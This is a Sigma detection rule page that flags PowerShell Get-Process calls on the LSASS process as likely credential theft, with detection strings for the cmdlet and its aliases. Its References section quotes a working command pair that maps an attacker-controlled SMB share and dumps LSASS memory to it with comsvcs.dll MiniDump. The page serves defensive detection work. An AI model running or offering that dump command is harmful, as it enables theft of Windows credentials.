PowerShell Get-Process LSASS
Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
Sigma rule (View on GitHub)
1title: PowerShell Get-Process LSASS
2id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349
3status: test
4description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
5references:
6 - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
7author: Florian Roth (Nextron Systems)
8date: 2021-04-23
9modified: 2023-01-05
10tags:
11 - attack.credential-access
12 - attack.t1552.004
13logsource:
14 category: process_creation
15 product: windows
16detection:
17 selection:
18 CommandLine|contains:
19 # You can add more permutation as you see fit
20 - 'Get-Process lsas'
21 - 'ps lsas'
22 - 'gps lsas'
23 condition: selection
24falsepositives:
25 - Unknown
26level: high
References
-
“Remote LSASS dump without touching local disk? Yes :) On target run: 1) net use x: \\smbserver_under_your_control\c$\ 2) powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full”
Read More
Related rules
- Certificate Exported Via PowerShell
- Certificate Exported Via PowerShell - ScriptBlock
- Cisco Crypto Commands
- Private Keys Reconnaissance Via CommandLine Tools
- Suspicious PFX File Creation